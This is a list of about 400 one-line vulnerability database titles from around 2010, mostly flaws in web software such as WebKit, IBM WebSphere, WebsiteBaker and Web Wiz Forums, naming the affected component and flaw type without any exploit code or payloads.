[66928] Cisco Wireless Control System webacs/QuickSearchAction.do searchText Parameter XSS
[66922] IBM WebSphere Service Registry and Repository ServiceRegistry/QueryWizardProcessStep1.do queryItems[0].value Parameter XSS
[66921] IBM WebSphere Service Registry and Repository ServiceRegistry/HelpSearch.do searchTerm Parameter XSS
[66857] WebKit SVGFontFaceElement Destructor Element Handling Use-after-free
[66856] WebKit emitDisjunction Regular Expression Interpretation Memory Corruption
[66855] WebKit JavaScript Array Signed Integer Overflow Memory Corruption
[66854] WebKit JIT Compiled JavaScript Stub Reentrancy Issue Arbitrary Code Execution
[66853] WebKit JavaScript Single Character String Replacement Overflow
[66852] Webkit SVGElement::attributeChanged SVG Attribute Synchronization Memory Corruption
[66851] WebKit SVG Floating Element Layout Handling Invalid Cast Memory Corruption
[66850] WebKit SVG foreignObject Element Layout Rendering Use-after-free
[66849] WebKit SVG Text Multiple Pseudo-elements Uninitialized Memory Access
[66848] WebKit RenderWidget::destroy CSS Rendering Counter Use-after-free
[66847] WebKit Layout Text Node Dynamic Modification Memory Disclosure
[66846] WebKit createBidiRunsForLine Inline Element Rendering Memory Corruption
[66845] WebKit Element::focus Element Focus Change Use-after-free
[66841] QtDemoBrowser webview.cpp Nonexistent Domain Name XSS
[66840] kwebkitpart webkitpart.cpp Nonexistent Domain Name XSS
[66824] Apple Mac OS X WebDAV Kernel Extension webdav_vfsops.c webdav_mount Function Local DoS
[66814] Amlib Amlibweb Library Management System webquery.dll app Parameter Overflow
[66785] Akamai Download Manager ActiveX Crafted Web Page Arbitrary File Download
[66766] phpMyAdmin Extension for TYPO3 Database Admin Interface Crafted URL Restriction Bypass
[66748] WebKit Layer Continuation Outlines Painting Memory Corruption
[66662] Nessus Web Server /feed Method Direct Request Version Information Disclosure
[66661] Nessus Web Server nessusd_www_server.nbin Unspecified XSS
[66638] Wing FTP Server Web Client Unspecified Arbitrary File Access
[66622] Novell GroupWise WebAccess Component Unspecified Javascript XSS
[66619] Novell GroupWise WebAccess Component Unspecified Form Parameter Header Injection XSS
[66618] Novell GroupWise WebAccess Component User Proxy Overflow
[66617] Novell GroupWise WebAccess Component Unspecified Authentication Information Disclosure
[66616] Novell GroupWise WebAccess Component HTML Message XSS
[66615] Novell GroupWise WebAccess Component Unspecified XSS
[66599] Mozilla Multiple Products importScripts Web Worker Method Cross-origin Data Disclosure
[66592] Mozilla Multiple Browsers NodeIterator Interface Javascript Callback Use-After-Free Code Execution
[66585] LILDBI-WEB e/admin/uploader.php Arbitrary File Upload
[66515] mlmmj on Debian Administrative Interface Traversal Arbitrary File Deletion
[66511] Pre Podcast Portal Partner Login Interface password Parameter SQL Injection
[66480] WebKit WebCore websockets/WebSocketHandshake.cpp WebSocketHandshake::readServerHandshake Function Off-by-one Remote DoS
[66455] TopManage SAP Web Module OLK /olk/c_p/searchCart.asp Multiple Field SQL Injection
[66453] InterScan Web Security Virtual Appliance /login_account_add_modify.jsp desc Parameter XSS
[66452] InterScan Web Security Virtual Appliance /servlet/com.trend.iwss.gui.servlet.MetricSetting Multiple Parameter XSS
[66369] Oracle Sun Java System Web Proxy Server Administration Server Unspecified Remote Issue (2010-2385)
[66359] Oracle Fusion Middleware WebLogic Server Component Plugin URL Response Splitting Trusted Header Injection
[66271] WebDM CMS cont_form.php cf_id Parameter SQL Injection
[66260] Open Web Analytics index.php Multiple Parameter Traversal Arbitrary File Access
[66258] BrotherScripts Recipe Website recipedetail.php id Parameter SQL Injection
[66226] Apache Axis2 Admin Interface Cookie Session Fixation
[66191] SOGo Web Calendar Arbitrary Private Event Access
[66047] WebKit Pasteboard::writeImage Invalid Image Copying NULL Pointer Dereference DoS
[66043] WebKit WebGL WebGLUnsignedIntArrayInternal::getCallback Out-of-bounds Read Memory Disclosure
[65979] WebDB index.asp qt Parameter SQL Injection
[65978] WebDB Search Functionality Multiple Parameter SQL Injection
[65973] Trend Micro InterScan Web Security Virtual Appliance uihelper Local Privilege Escalation
[65930] webERP Admin Password Manipulation CSRF
[65890] Cisco Adaptive Security Appliances (ASA) WebVPN Unspecified XSS
[65889] Cisco Adaptive Security Appliances (ASA) WebVPN +webvpn+/index.html Redirect CRLF Injection
[65876] WebsiteBaker admin/login/index.php username Parameter XSS
[65875] WebsiteBaker admin/preferences/details.php display_name Parameter XSS
[65874] WebsiteBaker modules/form/save_field.php title Parameter XSS
[65873] WebsiteBaker admin/preferences/details.php Multiple Parameter SQL Injection
[65872] WebsiteBaker admin/pages/add.php Multiple Parameter SQL Injection
[65871] WebsiteBaker admin/pages/settings2.php Multiple Parameter SQL Injection
[65870] WebsiteBaker admin/pages/sections.php module Parameter SQL Injection
[65869] WebsiteBaker admin/modules/details.php file Parameter Traversal File Enumeration
[65868] WebsiteBaker admin/templates/details.php file Parameter Traversal File Enumeration
[65867] WebsiteBaker admin/preferences/details.php language Parameter Traversal Arbitrary File Access
[65866] WebsiteBaker admin/languages/details.php code Parameter Traversal Arbitrary File Access
[65865] WebsiteBaker admin/pages/settings2.php template Parameter Traversal Arbitrary File Access
[65864] WebsiteBaker admin/pages/add.php type Parameter Traversal Arbitrary File Access
[65799] IBM WebSphere Application Server (WAS) Administration Console Unspecified XSS (2010-0779)
[65798] IBM WebSphere Application Server (WAS) Administration Console Unspecified XSS (2010-0778)
[65778] Trend Micro InterScan Web Security Virtual Appliance login_account_add_modify.jsp New Admin Addition CSRF
[65777] Trend Micro InterScan Web Security Virtual Appliance com.trend.iwss.gui.servlet.urllistset URL Block List Site Addition CSRF
[65776] Trend Micro InterScan Web Security Virtual Appliance servlet/com.trend.iwss.gui.servlet.XMLRPCcert filename Traversal Arbitrary File Upload
[65775] Trend Micro InterScan Web Security Virtual Appliance servlet/com.trend.iwss.gui.servlet.ConfigBackup pkg_name Parameter Arbitrary File Access
[65774] Trend Micro InterScan Web Security Virtual Appliance servlet/com.trend.iwss.gui.servlet.exportreport exportname Parameter Traversal Arbitrary File Access
[65756] EJBCA Admin Interface Multiple Unspecified XSS
[65748] 2daybiz Web Template customize.php tid Parameter SQL Injection
[65747] 2daybiz Web Template memberlogin.php password Parameter XSS
[65746] 2daybiz Web Template category.php keyword Parameter XSS
[65738] Novell iManager /nps/servlet/webacc/ Tree Parameter Off-by-One Remote DoS
[65737] Novell iManager /nps/servlet/webacc/ Multiple Parameter Overflow
[65732] Atlassian JIRA Bamboo Plugin Multiple Interface XSS
[65700] WebKit history.replaceState Cross-Origin Parent Frame Information Disclosure
[65679] Weborf HTTP Header Wide Character Handling Remote DoS
[65673] IBM WebSphere ILOG JRules faces/home.jsp scripts URI XSS
[65672] IBM WebSphere ILOG JRules faces/compose/compose.jsp URI XSS
[65671] IBM WebSphere ILOG JRules faces/explore/explore.jsp URI XSS
[65668] Groupmax World Wide Web Desktop Products Unspecified XSS
[65660] H264WebCam GET Request NULL Dereference Remote DoS
[65657] WebKit JavaScriptCore Page Transition Handling Use-after-free Issue
[65656] WebKit 'document.write()' Tokenizer Handling Memory Corruption
[65655] WebKit Unspecified Issue (2010-1769)
[65653] IBM WebSphere Application Server (WAS) on z/OS default_create.log BBOWWPFx Job / zPMT Profile Creation Information Disclosure
[65652] IBM WebSphere Application Server (WAS) on z/OS Unspecified Link Injection
[65651] IBM WebSphere Application Server (WAS) on z/OS Admin Console Unspecified XSS
[65650] IBM WebSphere Application Server (WAS) HTTP Channel gzip Chunked Data NullPointerException DoS
[65645] WebsiteBaker Hidden Form CSRF
[65636] Moodle lib/weblib.php Unspecified Parameter XSS
[65634] Moodle MNET Access Control Interface XSS
[65613] SAP J2EE Engine Telnet Interface SMB Relay Authentication Bypass
[65609] Travel Website Script / Easy Travel Portal tour_packages.asp country Parameter SQL Injection
[65556] Apple Mac OS X Ruby WEBrick HTTP Server UTF-7 Error Page XSS
[65552] HP OpenView Network Node Manager (OV NNM) ovwebsnmpsrv.exe jovgraph.exe CGI main() Function Remote Code Execution
[65547] Joke Website Script search.php keyword Parameter SQL Injection
[65546] Joke Website Script search.php keyword Parameter XSS
[65545] e-Book Store Website Script search.php keyword Parameter SQL Injection
[65544] SasCAM Webcam Server HTTP GET Request Remote DoS
[65526] Accoria Web Server servercfg.cgi dns Parameter XSS
[65525] Accoria Web Server httpdcfg.cgi name Parameter XSS
[65524] Accoria Web Server loadstatic.cgi desc Parameter XSS
[65523] Accoria Web Server getenv Sample Program Query String XSS
[65522] Accoria Web Server authcfg.cgi User Account Creation CSRF
[65521] Accoria Web Server loadstatic.cgi name Parameter Traversal Arbitrary File Access
[65520] Accoria Web Server Predictable httpmod-sessionid Cookie Session Hijack Weakness
[65519] Accoria Web Server authcfg.cgi path Parameter Remote Format String
[65503] Microsoft IE CImWebObj ActiveX Local Overflow DoS
[65501] D-Link DI-604 Ping Tools Interface IP Field XSS
[65500] D-Link DI-604 Ping Tools Interface IP Field DoS
[65483] VU Web Visitor Analyst redir.asp Multiple Parameter SQL Injection Authentication Bypass
[65476] LiteSpeed Web Server Script Source Code Information Disclosure
[65468] Avaya CallPilot Unified Messaging NMWEBINST.NMWebInstCtrl.1 ActiveX InstallFrom() Method Arbitrary Code Execution
[65448] WebKit Absolute Positioning Removal Layout Handling Use-after-free Arbitrary Code Execution
[65444] Wing FTP Server Admin Interface admin_loginok.html POST Request XSS
[65440] Web Application Finger Printer (WAFP) Multiple Script Insecure /tmp Handling Issue
[65439] IBM WebSphere Application Server for z/OS SSL Upload Large File DoS
[65438] IBM WebSphere Application Server for z/OS addNode.log Information Disclosure
[65437] IBM WebSphere Application Server for z/OS SIP Logging Trace File Information Disclosure
[65428] HP OpenView Network Node Manager ovwebsnmpsrv.exe ovutil.dll sprintf Function Overflow
[65427] HP OpenView Network Node Manager ovwebsnmpsrv.exe Error Handling Functionality Overflow
[65416] Miniweb index.php module Parameter Arbitrary File Access
[65400] WebKit Geolocation::disconnectFrame Geolocation Timer Handling Document Deletion Use-after-free
[65399] WebKit toAlphabetic List Marker Rendering Off-by-one
[65381] CA WebScan ActiveX Multiple Unspecified Arbitrary Code Execution
[65380] IgnitionSuite Web CMS Mailing List Arbitrary User Unsubscribe
[65355] 360 Web Manager webpages-form-led-edit.php IDFM Parameter SQL Injection
[65354] 360 Web Manager /menu/sub-menu-led-01.php IDM Parameter XSS
[65342] WebKit SVG RadialGradient Run-in Handling Use-after-free Arbitrary Code Execution
[65341] WebKit SVG Document Nested use Element Memory Corruption
[65340] WebKit Ordered List Insertion Handling Memory Corruption
[65338] WebKit IBM1147 Character Set Text Transformation Memory Corruption
[65337] WebKit RenderInline::splitInlines CSS-styled HTML Content Rendering Memory Corruption
[65336] WebKit SVG Document Recursive use Element Handling Use-after-free Arbitrary Code Execution
[65335] WebKit HTML Button / Menulist :first-letter Pseudo Class Element Modification Use-after-free
[65334] WebKit DOM Range Object Handling Use-after-free
[65333] WebKit RenderLayer::updateHoverActiveState Hover Event Handling Use-after-free Code Execution
[65332] WebKit Marquee Event Selection Change Handling Arbitrary Code Execution
[65330] WebKit TextArea Custom Font Handling Use-after-free
[65329] WebKit iframe.src JavaScript URL Multiple DOM Aliases Cross-Origin Bypass UXSS
[65328] WebKit HTML Element Custom Vertical Positioning Handling Use-after-free
[65327] WebKit HTML Document Fragment Handling XSS
[65326] WebKit Node.normalize Method Handling Use-after-free
[65325] WebKit NTLM Credential Cleartext Remote Disclosure
[65323] WebKit Clipboard URL Handling Arbitrary File Disclosure
[65322] WebKit FixedTableLayout::calcWidthArray HTML Table Layout Handling Memory Corruption
[65321] WebKit Image Drag and Drop Operation Page Refresh Use-after-free Arbitrary Code Execution
[65320] WebKit HTTP Site Redirect Referer Header Information Disclosure
[65319] WebKit DOM Constructor Object Handling XSS
[65318] WebKit FrameView::scheduleRelayoutOfSubtree Subtree Rendering Use-after-free
[65317] WebKit ContainerNode::removeChild Use-after-free Arbitrary Code Execution
[65316] WebKit CSS first-letter Pseudo-element Handling Use-after-free Arbitrary Code Execution
[65315] WebKit Script Tags / Attributes Copy-Pasting XSS
[65314] WebKit execCommand Method Clipboard Content Manipulation
[65313] WebKit TCP Port Request Handling Information Disclosure
[65312] WebKit Container Element ContentEditable Attribute Use-after-free Arbitrary Code Execution
[65311] WebKit textarea Element innerHTML / outerHTML Node Properties Handling UXSS
[65310] WebKit XMLTokenizer::doEnd Incorrect libxml API Usage DoS Weakness
[65309] WebKit SVG Document ConditionEventListener Double-free Arbitrary Code Execution
[65307] WebKit EventHandler::keyEvent Keyboard Focus Cross-Frame Keystroke Redirection
[65306] WebKit Incomplete Port Blacklist Remote Information Disclosure Weakness
[65305] WebKit DOCUMENT_POSITION_DISCONNECTED Attribute Handling Use-after-free Arbitrary Code Execution
[65304] WebKit Form Submission HTTP Redirect Remote Information Disclosure
[65303] WebKit SVG Crafted Canvas Cross-site Image Capture Disclosure
[65302] WebKit SVG Document use Element Handling Uninitialized Memory Arbitrary Code Execution
[65301] WebKit Local Storage / Web SQL Database Traversal Arbitrary File Creation
[65300] WebKit 'SecurityOrigin::SecurityOrigin' Function Malformed URL Handling Same-Origin Policy Bypass
[65299] WebKit CSS :visited Pseudo-class Handling Browsing History Disclosure
[65270] Webmedia Explorer /includes/folder.class.php readme Parameter CSRF
[65269] Cisco Linksys WAP54Gv3 Debug Interface Hardcoded Credentials Remote Command Execution
[65120] NITRO Web Gallery index.php PictureId Parameter SQL Injection
[65107] Weborf HTTP Range Header Handling Remote DoS
[65103] Websense Enterprise ISAPI Filter Plug-in HTTP Via Header Access Restriction Bypass
[65102] Hitachi Web Server SSL Client Certificate Revocation List Security Bypass
[65101] Hitachi Web Server SSL Packet Handling DoS
[65089] Horde Groupware / Horde Groupware Webmail Edition Unspecified CSRF
[65053] Slooze PHP Web Photo Album slooze.php file Parameter Arbitrary Command Execution
[65043] EvoCam Web Server GET Request Overflow
[65039] Visitor Web Stats Module for osCommerce index.php Accept-Language HTTP Header SQL Injection
[65002] D-Link DI-724P+ Admin Interface wlap.htm GET String XSS
[64980] Microsoft Outlook Web Access (OWA) URI id Parameter Information Disclosure
[64963] Webby Webserver GET Request Remote Overflow
[64962] Iomega Home Media Network Hard Drive smbwebclient.php Remote File Access
[64950] Brekeke PBX pbx/gate pbxadmin.web.PbxUserEdit Bean Admin Password Manipulation CSRF
[64941] Cisco Scientific Atlanta WebSTAR DPC2100R2 goform/_aslvl Multiple CSRF
[64863] eWebeditor ASP manage/ewebeditor/upload.asp style Parameter Arbitrary File Upload
[64862] eWebeditor ASP admin/ewebeditor/ewebeditor.htm style Parameter Arbitrary File Upload
[64861] eWebeditor ASP ewebeditor/db/ewebeditor.mdb Database Disclosure
[64860] eWebeditor ASP eWebEditor/admin/login.asp URI Admin Authentication Bypass
[64859] eWebeditor ASP ewebeditor/asp/browse.asp dir Parameter Traversal Arbitrary Directory Disclosure
[64835] Weblinks Component for Joomla! index.php id Parameter SQL Injection
[64833] Kingsoft WebShield KAVSafe.sys IOCTL Handling Memory Corruption
[64832] McAfee Email Gateway Web Access admin/systemWebAdminConfig.do Direct Request Authentication Bypass
[64810] Authentium Command Free Scan ActiveX (CSSWEBLib.Installer) InstallProduct1 Function Overflow
[64742] IBM WebSphere Application Server (WAS) JAX-RPC WS-Security / JAX-WS Runtime WebServices Tokens Access Restriction Bypass
[64741] IBM WebSphere Application Server (WAS) Multiple Component Unspecified Remote DoS
[64740] IBM WebSphere Application Server (WAS) Web Container response.sendRedirect Chunked Transfer Encoding GET Request Remote DoS
[64721] IBM WebSphere Application Server (WAS) Web Container Filename Handling Information Disclosure
[64712] WebLOADER izle.php vid Parameter SQL Injection
[64700] WebSAM DeploymentManager Packet Handling Unspecified Remote DoS
[64693] Abyss Web Server Admin Password Change CSRF
[64674] Free Download Manager Site Explorer Website Handling Overflow
[64611] MiniWebSvr Special Character Traversal Arbitrary File Access
[64579] ActivePDF WebGrabber APWebGrb.ocx GetStatus() Method Overflow
[64539] Microsoft Office OCX ActiveX Controls OpenWebFile() Arbitrary Program Execution
[64531] Microsoft Outlook Web Access (OWA) Path Traversal Attachment Handling Weakness
[64521] Apache Open For Business Project (OFBiz) Web Tools Section entityName Parameter XSS
[64513] HiWeb Wiesbaden Web 2.0 Social Network Freunde Community System user.php id Parameter SQL Injection
[64512] HiWeb Wiesbaden Live Shopping Multi Portal System index.php artikel Parameter SQL Injection
[64498] HiWeb Wiesbaden Ruckwarts Auktionshaus Products cafe.php id Parameter SQL Injection
[64496] HiWeb Wiesbaden Shop - Lizenzsystem - Downloadsystem index.php id Parameter SQL Injection
[64479] Apple Safari WebKit WebKit.dll marquee Tag Sequence Infinite Loop Remote DoS
[64457] eWebeditor upload.asp dir Parameter Traversal Arbitrary Directory Disclosure
[64340] Microsoft Windows RRAS InterfaceAdjustVLSPointers Null Dereference Remote DoS
[64324] KSES weblib.php fix_non_standard_entities Function XSS Protection Bypass
[64307] Apache Tomcat Web Application Manager/Host Manager CSRF
[64283] Easy File Sharing Web Server files.sdb File List Disclosure
[64281] Ektron CMS400.NET workarea/blankredirect.aspx Arbitrary Web Page Redirection
[64257] WebKit HTML Media Element Inside SVG Image Handling Memory Corruption
[64250] IBM WebSphere Application Server (WAS) SIP Message Trace Log Local Information Disclosure
[64249] IBM WebSphere Application Server (WAS) Trace Output Debugging Statement Information Disclosure
[64174] Palm Pre WebOS SMS Client HTML Injection
[64172] JBoss Enterprise Application Platform /web-console HTTP Request Information Disclosure
[64163] Webessence CMS webessence/comment_do.php itemid Parameter SQL Injection
[64162] Webessence CMS webessence/admin/media_new_do.php Arbitrary File Upload
[64161] Webessence CMS webessence/oembed.php id Parameter XSS
[64137] Wing FTP Server Web Client Unspecified Traversal Arbitrary File Access
[64126] webMathematica MSP Script Direct Request Path Disclosure
[64122] IBM WebSphere MQ Channel Process Incorrect Control Data Remote DoS
[64090] Web Wiz Forums post_message_form.asp FID Parameter Arbitrary Forum Access
[64084] NKInFoWeb loadorder.php id_sp Parameter SQL Injection
[64076] WebAsyst Shop-Script Unspecified Script Multiple Parameter XSS
[64075] WebAsyst Shop-Script Unspecified Script Multiple Parameter SQL Injection
[64074] WebAsyst Shop-Script Unspecified Script sub Parameter Traversal Unspecified Issue
[64006] Memorial Web Site Script show_memorial.php id Parameter SQL Injection
[64002] WebKit DocumentThreadableLoader::preflightFailure Synchronous Preflight XMLHttpRequest CSRF
[63979] Webmoney WMI Component for Joomla! index.php controller Parameter Directory Traversal Arbitrary File Access
[63978] Cisco Small Business Video Surveillance and Security Routers Management Interface Password Exposure
[63933] Cybozu Multiple Products Login Interface Access Restriction Bypass
[63926] 3Com H3C S9500E / S12500 Switches Unspecified Web Portal Authentication DoS
[63886] Gefest Web Home Server Multiple Unspecified Issues
[63885] FreeWebshop.org cookie_lang Cookie Traversal Arbitrary File Access
[63884] FreeWebshop.org fws_cust Cookie SQL Injection
[63883] FreeWebshop.org Account Brute Force Weakness
[63882] FreeWebshop.org fws_guest Cookie customerid Parameter Prediction Weakness
[63877] Tiny Java Web Server (TJWS) snoop.jsp Path Disclosure
[63876] Tiny Java Web Server (TJWS) Open Redirect
[63875] Tiny Java Web Server (TJWS) Arbitrary File Access
[63874] Tiny Java Web Server (TJWS) Unspecified Traversal Arbitrary Directory / File Access
[63870] Webessence CMS Page Deletion CSRF
[63869] Webessence CMS webessence/admin/media.php type Parameter XSS
[63868] SecureSphere Web Application and Database Firewall Appended Long String Request IPS Functionality Bypass
[63835] TANDBERG Video Communication Server Admin Web Console secure.php Crafted HTTP Cookie: tandberg_login= Header Authentication Bypass
[63809] Cisco Secure Desktop (CSD) CSDWebInstaller ActiveX Signature Verification Arbitrary Code Execution
[63798] Oracle Java Deployment Toolkit Java Web Start Argument Injection Arbitrary Program Execution
[63774] Oracle Collaboration Suite User Interface Components Unspecified Remote Issue
[63725] Multi Profit Websites page.php id Parameter Traversal Arbitrary File Access
[63675] Web TV Component for Joomla! index.php controller Parameter Traversal Local File Inclusion
[63629] WebMaid CMS template/wm025/footer.php Multiple Parameter Remote File Inclusion
[63628] WebMaid CMS template/calm/top.php menu Parameter Remote File Inclusion
[63627] WebMaid CMS template/calm/footer.php Multiple Parameter Remote File Inclusion
[63626] WebMaid CMS template/babyweb/index.php Multiple Parameter Remote File Inclusion
[63625] WebMaid CMS cArticle.php com Parameter Traversal Arbitrary File Access
[63624] WebMaid CMS cGuestbook.php com Parameter Traversal Arbitrary File Access
[63623] WebMaid CMS cContactus.php com Parameter Traversal Arbitrary File Access
[63594] IBM WebSphere Portal Login Process Unspecified Issue
[63586] webERPcustomer Component for Joomla! index.php controller Parameter Traversal Local File Inclusion
[63563] Oracle iPlanet Web Server WebDAV Implementation LOCK Request Handling Arbitrary File Access
[63542] uTorrent Web UI Basic Authorization Header NULL Dereference Remote DoS
[63515] VMware Server WebAccess JSON Error Message XSS
[63513] VMware Multiple Products WebAccess URL Forwarding Request Origin Spoofing Weakness
[63512] VMware Multiple Products WebAccess Context Data XSS
[63508] OmniWeb Crafted Short Data Type Outbound TCP Connection Restriction Bypass
[63506] Oracle Java SE / Java for Business Java Web Start Java Plug-in Unspecified Remote DoS
[63497] Oracle Java SE / Java for Business Java Web Start Plug-in Unspecified Unauthenticated Remote Issue (2010-0087)
[63496] Oracle Java SE / Java for Business Java Web Start Plug-in Unspecified Unauthenticated Remote Issue (2010-0090)
[63480] IBM WebSphere Application Server (WAS) Administration Console URI XSS
[63471] WebKit Node::notifyLocalNodeListsAttributeChanged Attribute Child Removal Use-after-free Arbitrary Code Execution
[63467] WebKit WebCore::CSSSelector style Element '*>
[63442] KimsQ _sys/_ext/skin/_skin/default_webzine/comment.php bbs[skin] Parameter Remote File Inclusion
[63369] Apple Mac OS X Wiki Server Unspecified Weblog Creation Restriction Bypass
[63336] IBM WebSphere Application Server (WAS) for z/OS Admin Console Multiple Unspecified Issues
[63325] Intellicom NetBiter webSCADA NetBiterConfig.exe hn Parameter Remote Overflow
[63312] Webesse E-Card Extension for TYPO3 Traversal Unspecified Issue
[63308] IBM WebSphere Application Server (WAS) Orb Client SSL Handshake Remote DoS
[63307] IBM WebSphere Application Server (WAS) J2CConnectionFactory Object Cleartext Password Storage
[63297] Miniweb index.php module Parameter Path Disclosure
[63288] Open Web Analytics mw_plugin.php IP Parameter Traversal Remote File Inclusion
[63282] IBM WEBi Unspecified XSS
[63241] WebsiteBaker Database Backup Direct Request Information Disclosure
[63195] Jokes Complete Website results.php searchingred Parameter XSS
[63194] Jokes Complete Website joke.php id Parameter XSS
[63193] Web Server Creator - Web Portal index.php Forum Page XSS
[63192] Web Server Creator - Web Portal news/form.php path Parameter Remote File Inclusion
[63191] Web Server Creator - Web Portal index.php pg Parameter Remote File Inclusion
[63190] Web Server Creator - Web Portal news/include/customize.php l Parameter Traversal Arbitrary File Access
[63137] Cherokee Web Server on Windows 8.3 Filename Alias Request Access Rules / Authentication Bypass
[63130] Webmatic index.php Multiple Parameter XSS
[63114] Google Chrome WebKit 'protocolIs()' Function Javascript URI Leading NULL Byte Cross-origin Policy Bypass
[63111] Google Chrome WebKit WebGL Arrays JavaScript Object Integer Overflow Issues
[63108] Google Chrome Web Database / STS Persistent Metadata Information Disclosure Weakness
[63079] IBM DB2 Content Manager Information Integrator for Content Web Single Sign-on Unspecified Issue
[63022] WebStatCaffe stat/referer.php date Parameter XSS
[63021] WebStatCaffe stat/pageviewerschart.php date Parameter XSS
[63020] WebStatCaffe stat/pageviewers.php date Parameter XSS
[63019] WebStatCaffe stat/mostvisitpagechart.php nopagesmost Parameter XSS
[63018] WebStatCaffe stat/visitorduration.php nodayshow Parameter XSS
[63017] WebStatCaffe stat/mostvisitpage.php nodayshow Parameter XSS
[63011] Webesse E-Card Extension for TYPO3 Unspecified Information Disclosure
[63010] Webesse Image Gallery Extension for TYPO3 Unspecified SQL Injection
[62996] Web Wiz Forums forum_posts.asp CSRF
[62995] Web Wiz Forums edit_post_form.asp CSRF
[62994] Web Wiz Forums new_topic_form.asp CSRF
[62993] Web Wiz Forums new_reply_form.asp CSRF
[62992] Web Wiz Forums new_poll_form.asp CSRF
[62991] Web Wiz Forums new_reply_form.asp CSRF
[62990] Web Wiz Forums edit_post.asp CSRF
[62989] Web Wiz Forums new_post.asp CSRF
[62988] Web Wiz Forums ajax_email_notify.asp CSRF
[62987] Web Wiz Forums email_notify.asp CSRF
[62986] Web Wiz Forums email_notify_remove.asp CSRF
[62985] Web Wiz Forums email_notify_subscriptions.asp CSRF
[62984] Web Wiz Forums file_upload.asp CSRF
[62983] Web Wiz Forums file_delete.asp CSRF
[62982] Web Wiz Forums file_manager.asp CSRF
[62981] Web Wiz Forums pm_new_message_form.asp CSRF
[62980] Web Wiz Forums pm_new_message.asp CSRF
[62979] Web Wiz Forums includes/message_form_inc.asp CSRF
[62978] Web Wiz Forums pm_inbox.asp CSRF
[62977] Web Wiz Forums pm_delete_message.asp CSRF
[62976] Web Wiz Forums pm_message.asp CSRF
[62975] Web Wiz Forums pm_delete_buddy.asp CSRF
[62974] Web Wiz Forums pm_buddy_list.asp CSRF
[62973] Web Wiz Forums pm_add_buddy.asp CSRF
[62969] Embedthis Appweb src/mpr/mprLib.c waitCallback() Function Remote DoS
[62967] HiWeb Wiesbaden Preisschlacht index.php aid Parameter SQL Injection
[62949] WebKit Image form.property Syntax Handling Use-after-free Arbitrary Code Execution
[62948] WebKit WebCore::RenderBlock CSS run-in Property Use-after-free Issue
[62947] WebKit HTMLInputElement::parseMappedAttribute Cached Page Navigation Use-after-free Arbitrary Code Execution
[62943] WebKit HTMLParser::handleResidualStyleCloseTagAcrossBlocks Misnested Residual Style Tags Handling Use-after-free Issue
[62942] WebKit RenderText::positionLineBox Text Box Removal Use-after-free Arbitrary Code Execution
[62941] WebKit window.close() XML Document Parsing Use-after-free Arbitrary Code Execution
[62940] WebKit FrameLoader::requestObject Object Element Style Change Use-after-free Arbitrary Code Execution
[62939] WebKit CSSParser::parseFontFaceSrc CSS Parser 'format()' Method Invalid Argument Handling Arbitrary Code Execution
[62902] Eros Webkatalog start.php id Parameter SQL Injection
[62901] IBM ENOVIA SmarTeam WebEditor/Authentication/LoginPage.aspx errMsg Parameter XSS
[62854] DWebPro start file Parameter Arbitrary Program Execution
[62836] Perforce P4Web Client Workspace Unspecified Traversal Arbitrary File Creation
[62747] Xerver HTTP Server Management Interface Non-numeric Port Assignment Remote DoS
[62742] CA SiteMinder WebWorks Help wwhelp/wwhimpl/common/html/bookmark.htm Unspecified Parameter XSS
[62741] CA SiteMinder WebWorks Help wwhelp/wwhimpl/common/scripts/switch.js Unspecified Parameter XSS
[62740] CA SiteMinder WebWorks Help wwhelp/wwhimpl/common/html/frameset.htm Unspecified Parameter XSS
[62739] CA SiteMinder WebWorks Help wwhelp/wwhimpl/api.htm Unspecified Parameter XSS
[62738] CA SiteMinder WebWorks Help wwhelp_entry.html Unspecified Parameter XSS
[62735] CSS Web Installer CSSWEBLib.Installer ActiveX Multiple Method Overflow
[62724] Drupal Core Locale Module Languages Interface Multiple Parameter XSS
[62678] SAP GUI (sapgui) EAI WebViewer3D ActiveX (webviewer3d.dll) Multiple Method Domain Information Overflow
[62677] SAP GUI (sapgui) EAI WebViewer3D ActiveX (webviewer3d.dll) Multiple Method File Path Overflow
[62643] Mereo Web Server Arbitrary File Content Disclosure
[62612] IBM Lotus Domino Web Access ActiveX Unspecified Overflow
[62584] WebAdministrator Lite CMS download.php s Parameter SQL Injection
[62581] WebsiteBaker framework/class.wb.php print_error() Function Security Bypass
[62525] Webee Comments Component for Joomla! Multiple BBCode Tags XSS
[62514] IBM WebSphere Portal Portlet Palette Search Field XSS
[62462] WebKit GIF Image Decoder Allocation Failure Memory Corruption
[62459] Cisco Collaboration Server (CCS) webline/html/admin/wcs/LoginPage.jhtml dest Parameter XSS
[62449] LiteSpeed Web Server Admin User Creation CSRF
[62430] Cisco ASA 5500 Series WebVPN Malformed DTLS Message Remote DoS
[62428] Mozilla Multiple Browsers Web Worker Array Handling Heap Corruption
[62375] Palm Pre WebOS Mail Handling Unspecified Remote File Access
[62374] Palm Pre WebOS Crafted Web Page LunaSysMgr Process DoS
[62368] Palm Pre WebOS Calendar Application Event/Title Field XSS
[62367] Palm Pre WebOS Email Notification System FROM Field XSS
[62366] WebCalendar Admin Password Change Request CSRF
[62355] SAP NetWeaver WebDynpro Runtime Unspecified XSS
[62351] Portrait Campaign Manager webresource.axd Multiple Parameter XSS
[62338] NetAdvantage WebHtmlEditor Component InitialDirectory Parameter Traversal Directory Access
[62337] Dillo Web Browser Cookie Access Restriction Weakness Information Disclosure
[62334] Webee Comments Component for Joomla! index2.php articleId SQL Injection
[62323] gnome-screensaver gnome-session D-Bus Interface Screen Locking Bypass
[62317] WebKit ruby Tag Handling Invalid Type Casting Issue
[62313] Google Chrome WebKit WebCore/bindings/v8/custom/V8DOMWindowCustom.cpp window.open Method Same Origin Policy Bypass
[62308] WebKit XMLHttpRequests Directory Listing Information Disclosure
[62307] WebKit CSS Stylesheet Cross-origin Loading Information Disclosure
[62306] Google Chrome WebKit Mouse-click Event Handling Pop-up Blocker Restriction Bypass Weakness
[62293] Palm Pre WebOS Application Usage Remote Information Disclosure
[62290] Accellion File Transfer Appliance web_client_user_guide.html lang Parameter Traversal Arbitrary File Access
[62286] Cisco IronPort Encryption Appliance WebSafe Servlet Unspecified Arbitrary File Access
[62285] Cisco IronPort Encryption Appliance Admin Interface Unspecified Arbitrary File Access
[62246] Microsoft Data Analyzer ActiveX Web Page Handling Unspecified Arbitrary Code Execution
[62234] Sun ONE Web Server iPlanet Log Analyzer Crafted DNS Response Inverse Lookup Log Corruption XSS
[62233] Sun ONE Web Server Crafted DNS Response format= Substring Log-preview Functionality Weakness
[62232] Sun ONE Web Server Logging Format Weakness Crafted DNS Response IP Address Spoofing
